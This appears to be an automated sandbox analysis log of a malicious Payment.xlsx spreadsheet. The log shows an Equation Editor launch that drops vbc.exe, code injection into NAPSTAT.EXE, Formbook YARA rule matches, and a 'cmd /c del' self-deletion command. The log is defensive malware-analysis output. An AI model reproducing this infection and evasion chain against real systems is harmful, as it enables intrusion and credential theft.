          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FF01D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FF1148 NtOpenThread,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FF010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FF10D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FF0078 NtResumeThread,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FF0060 NtQuerySection,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FF0048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEF938 NtWriteFile,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FF1930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEF8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FF1D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FF0C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_000981B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00098260 NtReadFile,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_000982E0 NtClose,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00098390 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00098392 NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003913BC
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0039D8BB
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0039D2CF
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00391344
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0039CBD0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00471BF4
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00471C5A
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004719E7
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004715BF
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E0448
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E4418
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E65E0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E66F8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E5755
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E38B0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E4CC9
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E8DD9
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E80E0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E80D0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E5170
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E83D8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E0438
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007ED428
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E64FC
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E7548
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E7538
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E6663
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E66C8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E8770
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E8760
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E4701
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007ED8C0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E9899
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E89C8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E89B8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E6A07
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007EDB58
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E8BF8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007EEED0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007EEFD0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0039AC50
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00391170
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003912B0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00401030
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B944
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041BB84
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00408C4B
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00408C50
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041BCF5
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041C5ED
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B70F
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00402FB0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B3E0C6
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B6D005
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B5905A
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B43040
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B3E2E9
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BE1238
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B663DB
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B3F3CF
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B42305
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B8A37B
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B47353
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B75485
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B51489
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B7D47D
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B5C5F0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B4351F
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B86540
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B44680
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B4E6C1
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BE2622
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B4C7BC
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BC579A
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B757C3
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BDF8EE
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B6286D
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B4C85C
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B429B2
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BE098E
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B569FE
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BC5955
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BF3A83
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BECBA4
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B3FBD7
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BCDBDA
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B67B00
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BDFDDD
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B70D3B
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B4CD5B
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B72E2F
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B5EE4C
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B50F3F
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B6DF7C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020A1238
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_02002305
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FFE0C6
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_02007353
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0204A37B
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020263DB
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0202D005
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FFF3CF
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_02003040
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0201905A
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FFE2E9
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020A2622
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0204A634
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_02004680
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0200E6C1
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0208579A
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0200C7BC
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020357C3
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0203D47D
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_02035485
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_02011489
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0200351F
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_02046540
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0201C5F0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020B3A83
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_02027B00
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020ACBA4
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0208DBDA
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FFFBD7
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0200C85C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0202286D
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0209F8EE
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_02085955
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020A098E
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020029B2
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020169FE
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_02032E2F
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0201EE4C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_02010F3F
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0202DF7C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_02030D3B
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0200CD5B
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0209FDDD
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0009C5ED
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0009B944
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0009BB84
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00088C4B
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00088C50
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0009BCF5
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00082D90
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00082FB0
          Source: Payment.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Users\Public\vbc.exeCode function: String function: 00B83F92 appears 108 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00BAF970 appears 81 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00B8373B appears 238 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00B3DF5C appears 118 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00B3E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 01FFDF5C appears 118 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 0204373B appears 238 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 02043F92 appears 108 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 0206F970 appears 81 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 01FFE2A8 appears 38 times
          Source: so[1].exe.2.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
          Source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: so[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: explorer.exe, 00000008.00000000.2182363529.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@14/8@7/7
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Payment.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRF288.tmpJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
          Source: Payment.xlsxVirustotal: Detection: 18%
          Source: Payment.xlsxReversingLabs: Detection: 10%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{8856F961-340A-11D0-A96B-00C04FD705A2}\InProcServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: Payment.xlsxStatic file information: File size 1363456 > 1048576
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: vbc.exe, NAPSTAT.EXE
          Source: Binary string: napstat.pdb source: vbc.exe, 00000007.00000003.2227630571.00000000007DE000.00000004.00000001.sdmp
          Source: Payment.xlsxInitial sample: OLE indicators vbamacros = False
          Source: Payment.xlsxInitial sample: OLE indicators encrypted = True
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0039C4C8 pushfd ; retn 0030h
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0039C588 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E5748 push eax; retn 007Fh
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E6FC8 pushfd ; retf
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00415AFB push eax; iretd
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B3F2 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B3FB push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B3A5 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B45C push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00414E3F push edx; retf
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00415FF0 push es; iretd
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B3DFA1 push ecx; ret
